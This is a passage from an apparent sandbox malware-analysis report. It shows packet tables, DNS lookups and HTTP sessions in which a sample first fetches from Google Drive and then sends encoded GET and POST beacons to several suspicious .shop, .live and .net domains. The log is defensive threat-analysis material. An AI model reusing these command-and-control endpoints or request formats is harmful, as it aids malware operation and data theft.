                                                                                                  Dec 30, 2024 10:57:08.063308954 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.063318968 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.063354969 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.063360929 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.067079067 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.067111015 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.067127943 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.067132950 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.067183018 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.067188025 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.067321062 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.067351103 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.067363024 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.067367077 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.067414999 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.071408033 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.071460962 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.071491957 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.071502924 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.071506977 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.071546078 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.071549892 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.075237989 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.075269938 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.075275898 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.075279951 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.075323105 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.075324059 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.075330973 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.075371981 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.075376034 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.081417084 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.081453085 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.081460953 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.081465006 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.081506014 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.081511974 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.081516027 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.081557989 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.081559896 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.081566095 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.081600904 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.091496944 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.091633081 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.091658115 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.091691017 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.091696024 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.091741085 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.091782093 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.091846943 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.091887951 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.091932058 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.091948032 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.091960907 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.091965914 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:58:26.935838938 CET4998780192.168.2.6188.114.97.3
                                                                                                  Dec 30, 2024 10:58:26.940645933 CET8049987188.114.97.3192.168.2.6
                                                                                                  Dec 30, 2024 10:58:26.940717936 CET4998780192.168.2.6188.114.97.3
                                                                                                  Dec 30, 2024 10:58:26.952094078 CET4998780192.168.2.6188.114.97.3
                                                                                                  Dec 30, 2024 10:58:26.956854105 CET8049987188.114.97.3192.168.2.6
                                                                                                  Dec 30, 2024 10:58:27.534137011 CET8049987188.114.97.3192.168.2.6
                                                                                                  Dec 30, 2024 10:58:27.534163952 CET8049987188.114.97.3192.168.2.6
                                                                                                  Dec 30, 2024 10:58:27.534174919 CET8049987188.114.97.3192.168.2.6
                                                                                                  Dec 30, 2024 10:58:27.534251928 CET8049987188.114.97.3192.168.2.6
                                                                                                  Dec 30, 2024 10:58:27.534284115 CET4998780192.168.2.6188.114.97.3
                                                                                                  Dec 30, 2024 10:58:27.534313917 CET4998780192.168.2.6188.114.97.3
                                                                                                  Dec 30, 2024 10:58:27.539817095 CET4998780192.168.2.6188.114.97.3
                                                                                                  Dec 30, 2024 10:58:27.544663906 CET8049987188.114.97.3192.168.2.6
                                                                                                  Dec 30, 2024 10:58:42.903278112 CET4998880192.168.2.652.223.13.41
                                                                                                  Dec 30, 2024 10:58:42.908164024 CET804998852.223.13.41192.168.2.6
                                                                                                  Dec 30, 2024 10:58:42.908236027 CET4998880192.168.2.652.223.13.41
                                                                                                  Dec 30, 2024 10:58:42.920346975 CET4998880192.168.2.652.223.13.41
                                                                                                  Dec 30, 2024 10:58:42.925101995 CET804998852.223.13.41192.168.2.6
                                                                                                  Dec 30, 2024 10:58:43.355765104 CET804998852.223.13.41192.168.2.6
                                                                                                  Dec 30, 2024 10:58:43.355808973 CET804998852.223.13.41192.168.2.6
                                                                                                  Dec 30, 2024 10:58:43.355868101 CET4998880192.168.2.652.223.13.41
                                                                                                  Dec 30, 2024 10:58:44.427251101 CET4998880192.168.2.652.223.13.41
                                                                                                  Dec 30, 2024 10:58:45.445389986 CET4998980192.168.2.652.223.13.41
                                                                                                  Dec 30, 2024 10:58:45.450258970 CET804998952.223.13.41192.168.2.6
                                                                                                  Dec 30, 2024 10:58:45.450354099 CET4998980192.168.2.652.223.13.41
                                                                                                  Dec 30, 2024 10:58:45.465023994 CET4998980192.168.2.652.223.13.41
                                                                                                  Dec 30, 2024 10:58:45.469854116 CET804998952.223.13.41192.168.2.6
                                                                                                  Dec 30, 2024 10:58:45.893651962 CET804998952.223.13.41192.168.2.6
                                                                                                  Dec 30, 2024 10:58:45.893845081 CET804998952.223.13.41192.168.2.6
                                                                                                  Dec 30, 2024 10:58:45.893955946 CET4998980192.168.2.652.223.13.41
                                                                                                  Dec 30, 2024 10:58:46.974056005 CET4998980192.168.2.652.223.13.41
                                                                                                  Dec 30, 2024 10:58:47.992618084 CET4999080192.168.2.652.223.13.41
                                                                                                  Dec 30, 2024 10:58:47.997415066 CET804999052.223.13.41192.168.2.6
                                                                                                  Dec 30, 2024 10:58:47.997576952 CET4999080192.168.2.652.223.13.41
                                                                                                  Dec 30, 2024 10:58:48.012761116 CET4999080192.168.2.652.223.13.41
                                                                                                  Dec 30, 2024 10:58:48.017611027 CET804999052.223.13.41192.168.2.6
                                                                                                  Dec 30, 2024 10:58:48.017751932 CET804999052.223.13.41192.168.2.6
                                                                                                  Dec 30, 2024 10:58:48.451124907 CET804999052.223.13.41192.168.2.6
                                                                                                  Dec 30, 2024 10:58:48.451328039 CET804999052.223.13.41192.168.2.6
                                                                                                  Dec 30, 2024 10:58:48.451399088 CET4999080192.168.2.652.223.13.41
                                                                                                  Dec 30, 2024 10:58:49.520940065 CET4999080192.168.2.652.223.13.41
                                                                                                  Dec 30, 2024 10:58:50.539694071 CET4999180192.168.2.652.223.13.41
                                                                                                  Dec 30, 2024 10:58:50.544605970 CET804999152.223.13.41192.168.2.6
                                                                                                  Dec 30, 2024 10:58:50.544739962 CET4999180192.168.2.652.223.13.41
                                                                                                  Dec 30, 2024 10:58:50.554193974 CET4999180192.168.2.652.223.13.41
                                                                                                  Dec 30, 2024 10:58:50.558973074 CET804999152.223.13.41192.168.2.6
                                                                                                  Dec 30, 2024 10:58:50.985822916 CET804999152.223.13.41192.168.2.6
                                                                                                  Dec 30, 2024 10:58:50.985945940 CET804999152.223.13.41192.168.2.6
                                                                                                  Dec 30, 2024 10:58:50.986007929 CET4999180192.168.2.652.223.13.41
                                                                                                  Dec 30, 2024 10:58:50.988922119 CET4999180192.168.2.652.223.13.41
                                                                                                  Dec 30, 2024 10:58:50.993762970 CET804999152.223.13.41192.168.2.6
                                                                                                  Dec 30, 2024 10:58:56.330504894 CET4999380192.168.2.6108.179.193.23
                                                                                                  Dec 30, 2024 10:58:56.335383892 CET8049993108.179.193.23192.168.2.6
                                                                                                  Dec 30, 2024 10:58:56.335484028 CET4999380192.168.2.6108.179.193.23
                                                                                                  Dec 30, 2024 10:58:56.347444057 CET4999380192.168.2.6108.179.193.23
                                                                                                  Dec 30, 2024 10:58:56.352276087 CET8049993108.179.193.23192.168.2.6
                                                                                                  Dec 30, 2024 10:58:57.038362026 CET8049993108.179.193.23192.168.2.6
                                                                                                  Dec 30, 2024 10:58:57.038372993 CET8049993108.179.193.23192.168.2.6
                                                                                                  Dec 30, 2024 10:58:57.038383007 CET8049993108.179.193.23192.168.2.6
                                                                                                  Dec 30, 2024 10:58:57.038423061 CET8049993108.179.193.23192.168.2.6
                                                                                                  Dec 30, 2024 10:58:57.038433075 CET8049993108.179.193.23192.168.2.6
                                                                                                  Dec 30, 2024 10:58:57.038443089 CET8049993108.179.193.23192.168.2.6
                                                                                                  Dec 30, 2024 10:58:57.038454056 CET8049993108.179.193.23192.168.2.6
                                                                                                  Dec 30, 2024 10:58:57.038535118 CET4999380192.168.2.6108.179.193.23
                                                                                                  Dec 30, 2024 10:58:57.038535118 CET4999380192.168.2.6108.179.193.23
                                                                                                  Dec 30, 2024 10:58:57.083384991 CET4999380192.168.2.6108.179.193.23
                                                                                                  Dec 30, 2024 10:58:57.848984003 CET4999380192.168.2.6108.179.193.23
                                                                                                  Dec 30, 2024 10:58:58.867455959 CET4999480192.168.2.6108.179.193.23
                                                                                                  Dec 30, 2024 10:58:58.872246027 CET8049994108.179.193.23192.168.2.6
                                                                                                  Dec 30, 2024 10:58:58.872348070 CET4999480192.168.2.6108.179.193.23
                                                                                                  Dec 30, 2024 10:58:58.887347937 CET4999480192.168.2.6108.179.193.23
                                                                                                  Dec 30, 2024 10:58:58.892136097 CET8049994108.179.193.23192.168.2.6
                                                                                                  Dec 30, 2024 10:58:59.564294100 CET8049994108.179.193.23192.168.2.6
                                                                                                  Dec 30, 2024 10:58:59.564302921 CET8049994108.179.193.23192.168.2.6
                                                                                                  Dec 30, 2024 10:58:59.564316034 CET8049994108.179.193.23192.168.2.6
                                                                                                  Dec 30, 2024 10:58:59.564321041 CET8049994108.179.193.23192.168.2.6
                                                                                                  Dec 30, 2024 10:58:59.564333916 CET8049994108.179.193.23192.168.2.6
                                                                                                  Dec 30, 2024 10:58:59.564338923 CET8049994108.179.193.23192.168.2.6
                                                                                                  Dec 30, 2024 10:58:59.564543009 CET4999480192.168.2.6108.179.193.23
                                                                                                  Dec 30, 2024 10:59:00.395952940 CET4999480192.168.2.6108.179.193.23
                                                                                                  Dec 30, 2024 10:59:01.414779902 CET4999580192.168.2.6108.179.193.23
                                                                                                  Dec 30, 2024 10:59:01.419559956 CET8049995108.179.193.23192.168.2.6
                                                                                                  Dec 30, 2024 10:59:01.419745922 CET4999580192.168.2.6108.179.193.23
                                                                                                  Dec 30, 2024 10:59:01.435453892 CET4999580192.168.2.6108.179.193.23
                                                                                                  Dec 30, 2024 10:59:01.440308094 CET8049995108.179.193.23192.168.2.6
                                                                                                  Dec 30, 2024 10:59:01.440380096 CET8049995108.179.193.23192.168.2.6
                                                                                                  Dec 30, 2024 10:59:02.166239023 CET8049995108.179.193.23192.168.2.6
                                                                                                  Dec 30, 2024 10:59:02.166261911 CET8049995108.179.193.23192.168.2.6
                                                                                                  Dec 30, 2024 10:59:02.166270018 CET8049995108.179.193.23192.168.2.6
                                                                                                  Dec 30, 2024 10:59:02.166275024 CET8049995108.179.193.23192.168.2.6
                                                                                                  Dec 30, 2024 10:59:02.166289091 CET8049995108.179.193.23192.168.2.6
                                                                                                  Dec 30, 2024 10:59:02.166292906 CET8049995108.179.193.23192.168.2.6
                                                                                                  Dec 30, 2024 10:59:02.166341066 CET4999580192.168.2.6108.179.193.23
                                                                                                  Dec 30, 2024 10:59:02.166392088 CET4999580192.168.2.6108.179.193.23
                                                                                                  Dec 30, 2024 10:59:02.954509020 CET4999580192.168.2.6108.179.193.23
                                                                                                  Dec 30, 2024 10:59:03.961853981 CET4999680192.168.2.6108.179.193.23
                                                                                                  Dec 30, 2024 10:59:03.966656923 CET8049996108.179.193.23192.168.2.6
                                                                                                  Dec 30, 2024 10:59:03.966731071 CET4999680192.168.2.6108.179.193.23
                                                                                                  Dec 30, 2024 10:59:03.976330996 CET4999680192.168.2.6108.179.193.23
                                                                                                  Dec 30, 2024 10:59:03.981173038 CET8049996108.179.193.23192.168.2.6
                                                                                                  Dec 30, 2024 10:59:04.588622093 CET8049996108.179.193.23192.168.2.6
                                                                                                  Dec 30, 2024 10:59:04.630258083 CET4999680192.168.2.6108.179.193.23
                                                                                                  Dec 30, 2024 10:59:09.588984966 CET8049996108.179.193.23192.168.2.6
                                                                                                  Dec 30, 2024 10:59:09.589168072 CET4999680192.168.2.6108.179.193.23
                                                                                                  Dec 30, 2024 10:59:09.590459108 CET4999680192.168.2.6108.179.193.23
                                                                                                  Dec 30, 2024 10:59:09.595333099 CET8049996108.179.193.23192.168.2.6

                                                                                                  UDP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Dec 30, 2024 10:57:02.944675922 CET6457153192.168.2.61.1.1.1
                                                                                                  Dec 30, 2024 10:57:02.951492071 CET53645711.1.1.1192.168.2.6
                                                                                                  Dec 30, 2024 10:57:04.313318014 CET4933053192.168.2.61.1.1.1
                                                                                                  Dec 30, 2024 10:57:04.320293903 CET53493301.1.1.1192.168.2.6
                                                                                                  Dec 30, 2024 10:58:12.894064903 CET6064553192.168.2.61.1.1.1
                                                                                                  Dec 30, 2024 10:58:12.902815104 CET53606451.1.1.1192.168.2.6
                                                                                                  Dec 30, 2024 10:58:17.915021896 CET5962453192.168.2.61.1.1.1
                                                                                                  Dec 30, 2024 10:58:18.911288023 CET5962453192.168.2.61.1.1.1
                                                                                                  Dec 30, 2024 10:58:19.927016973 CET5962453192.168.2.61.1.1.1
                                                                                                  Dec 30, 2024 10:58:21.875613928 CET53596241.1.1.1192.168.2.6
                                                                                                  Dec 30, 2024 10:58:21.875626087 CET53596241.1.1.1192.168.2.6
                                                                                                  Dec 30, 2024 10:58:21.875711918 CET53596241.1.1.1192.168.2.6
                                                                                                  Dec 30, 2024 10:58:26.913516045 CET6281353192.168.2.61.1.1.1
                                                                                                  Dec 30, 2024 10:58:26.925690889 CET53628131.1.1.1192.168.2.6
                                                                                                  Dec 30, 2024 10:58:42.586324930 CET6538553192.168.2.61.1.1.1
                                                                                                  Dec 30, 2024 10:58:42.901125908 CET53653851.1.1.1192.168.2.6
                                                                                                  Dec 30, 2024 10:58:55.993215084 CET4995453192.168.2.61.1.1.1
                                                                                                  Dec 30, 2024 10:58:56.327861071 CET53499541.1.1.1192.168.2.6

                                                                                                  DNS Queries

                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                  Dec 30, 2024 10:57:02.944675922 CET192.168.2.61.1.1.10x20f6Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                  Dec 30, 2024 10:57:04.313318014 CET192.168.2.61.1.1.10xfc8dStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                  Dec 30, 2024 10:58:12.894064903 CET192.168.2.61.1.1.10x4afStandard query (0)www.bellhomehd.shopA (IP address)IN (0x0001)false
                                                                                                  Dec 30, 2024 10:58:17.915021896 CET192.168.2.61.1.1.10x80baStandard query (0)www.einpisalpace.shopA (IP address)IN (0x0001)false
                                                                                                  Dec 30, 2024 10:58:18.911288023 CET192.168.2.61.1.1.10x80baStandard query (0)www.einpisalpace.shopA (IP address)IN (0x0001)false
                                                                                                  Dec 30, 2024 10:58:19.927016973 CET192.168.2.61.1.1.10x80baStandard query (0)www.einpisalpace.shopA (IP address)IN (0x0001)false
                                                                                                  Dec 30, 2024 10:58:26.913516045 CET192.168.2.61.1.1.10x349aStandard query (0)www.marposet.shopA (IP address)IN (0x0001)false
                                                                                                  Dec 30, 2024 10:58:42.586324930 CET192.168.2.61.1.1.10x7337Standard query (0)www.techforcreators.liveA (IP address)IN (0x0001)false
                                                                                                  Dec 30, 2024 10:58:55.993215084 CET192.168.2.61.1.1.10x110aStandard query (0)www.missvet.netA (IP address)IN (0x0001)false

                                                                                                  DNS Answers

                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                  Dec 30, 2024 10:57:02.951492071 CET1.1.1.1192.168.2.60x20f6No error (0)drive.google.com142.250.186.174A (IP address)IN (0x0001)false
                                                                                                  Dec 30, 2024 10:57:04.320293903 CET1.1.1.1192.168.2.60xfc8dNo error (0)drive.usercontent.google.com172.217.16.193A (IP address)IN (0x0001)false
                                                                                                  Dec 30, 2024 10:58:12.902815104 CET1.1.1.1192.168.2.60x4afName error (3)www.bellhomehd.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                  Dec 30, 2024 10:58:21.875613928 CET1.1.1.1192.168.2.60x80baServer failure (2)www.einpisalpace.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                  Dec 30, 2024 10:58:21.875626087 CET1.1.1.1192.168.2.60x80baServer failure (2)www.einpisalpace.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                  Dec 30, 2024 10:58:21.875711918 CET1.1.1.1192.168.2.60x80baServer failure (2)www.einpisalpace.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                  Dec 30, 2024 10:58:26.925690889 CET1.1.1.1192.168.2.60x349aNo error (0)www.marposet.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                                                  Dec 30, 2024 10:58:26.925690889 CET1.1.1.1192.168.2.60x349aNo error (0)www.marposet.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                                                  Dec 30, 2024 10:58:42.901125908 CET1.1.1.1192.168.2.60x7337No error (0)www.techforcreators.live52.223.13.41A (IP address)IN (0x0001)false
                                                                                                  Dec 30, 2024 10:58:56.327861071 CET1.1.1.1192.168.2.60x110aNo error (0)www.missvet.netmissvet.netCNAME (Canonical name)IN (0x0001)false
                                                                                                  Dec 30, 2024 10:58:56.327861071 CET1.1.1.1192.168.2.60x110aNo error (0)missvet.net108.179.193.23A (IP address)IN (0x0001)false

                                                                                                  HTTP Request Dependency Graph

                                                                                                  • drive.google.com
                                                                                                  • drive.usercontent.google.com
                                                                                                  • www.marposet.shop
                                                                                                  • www.techforcreators.live
                                                                                                  • www.missvet.net

                                                                                                  HTTP Packets

                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.649987188.114.97.3804608C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 30, 2024 10:58:26.952094078 CET509OUTGET /i28d/?yt=LNd8mbFxBhGLQV&TB1lE=HRfyw8S2LmkNqQTdj7e+XySdNCmnttnomENxnEdal27Zyt9OvbxgyEIUd+T7UYt3ulEBayBzfHST035Fo0DtVgaGE1Ztsznh/Pj+8/p9meyljlzEGEhG/wkxevrzOSgU56GIkV0= HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.marposet.shop
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SM-A700FD Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                  Dec 30, 2024 10:58:27.534137011 CET1236INHTTP/1.1 404 Not Found
                                                                                                  Date: Mon, 30 Dec 2024 09:58:27 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Vary: Accept-Encoding
                                                                                                  Last-Modified: Sat, 07 Dec 2024 23:09:32 GMT
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rESKkjTNQhj7%2Ftb0d736ct3OjvnL7sCtf04bhnodmVQ6CN5pkciIfU2IHP0TC3hoxkjWeixjTZ2p5RlzrPGN7De9xHJPLa7%2BxasT%2FrVceo6DGvOPeH5E%2BDMWlwAFubmT2PVV6A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8fa12be4cd434321-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1559&min_rtt=1559&rtt_var=779&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=509&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                  Data Raw: 35 38 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e [TRUNCATED]
                                                                                                  Data Ascii: 586<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="text/css
                                                                                                  Dec 30, 2024 10:58:27.534163952 CET224INData Raw: 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74
                                                                                                  Data Ascii: "> body {font-size:14px; color:#777777; font-family:arial; text-align:center;} h1 {font-size:180px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-we
                                                                                                  Dec 30, 2024 10:58:27.534174919 CET811INData Raw: 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6d 61 72 67 69 6e 3a 20 2d 33 70 78 20 30 20 33 39 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 70 20 7b 77 69 64 74 68 3a 33 32 30 70 78 3b 20 74 65
                                                                                                  Data Ascii: ight: bold; letter-spacing: -1px; margin: -3px 0 39px;} p {width:320px; text-align:center; margin-left:auto;margin-right:auto; margin-top: 30px } div {width:320px; text-align:center; margin-left:auto;margin-right:auto;}


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  1192.168.2.64998852.223.13.41804608C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 30, 2024 10:58:42.920346975 CET782OUTPOST /6rby/ HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Host: www.techforcreators.live
                                                                                                  Origin: http://www.techforcreators.live
                                                                                                  Content-Length: 210
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Cache-Control: no-cache
                                                                                                  Referer: http://www.techforcreators.live/6rby/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SM-A700FD Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                  Data Raw: 54 42 31 6c 45 3d 37 67 48 32 32 43 70 43 4b 6b 30 47 4b 4b 31 31 55 31 35 39 46 75 57 66 34 66 49 46 66 4c 49 75 55 5a 4d 35 34 2f 77 38 67 6c 51 30 43 4f 49 64 78 34 6a 67 39 55 6d 56 48 54 59 65 39 50 35 66 49 4e 52 45 58 59 63 2f 4e 34 71 6c 6c 67 56 46 48 67 35 4f 77 6f 54 77 51 61 6b 47 55 55 65 48 4a 4a 6a 55 43 65 61 63 5a 33 35 47 39 50 42 59 6f 50 62 66 78 39 4e 79 77 57 69 6c 6e 73 44 30 75 39 63 7a 55 57 46 30 73 72 61 36 65 73 65 69 42 34 4d 34 56 54 2f 33 48 64 61 68 48 65 6e 52 53 7a 63 4a 45 5a 49 62 54 44 6a 4b 4e 4e 32 6b 4e 39 4b 71 53 69 2b 6c 2b 6a 64 4b 70 63 76 67 38 74 45 32 64 67 6f 49 4f 6d 6a 65
                                                                                                  Data Ascii: TB1lE=7gH22CpCKk0GKK11U159FuWf4fIFfLIuUZM54/w8glQ0COIdx4jg9UmVHTYe9P5fINREXYc/N4qllgVFHg5OwoTwQakGUUeHJJjUCeacZ35G9PBYoPbfx9NywWilnsD0u9czUWF0sra6eseiB4M4VT/3HdahHenRSzcJEZIbTDjKNN2kN9KqSi+l+jdKpcvg8tE2dgoIOmje
                                                                                                  Dec 30, 2024 10:58:43.355765104 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                  content-length: 0
                                                                                                  connection: close


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  2192.168.2.64998952.223.13.41804608C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 30, 2024 10:58:45.465023994 CET806OUTPOST /6rby/ HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Host: www.techforcreators.live
                                                                                                  Origin: http://www.techforcreators.live
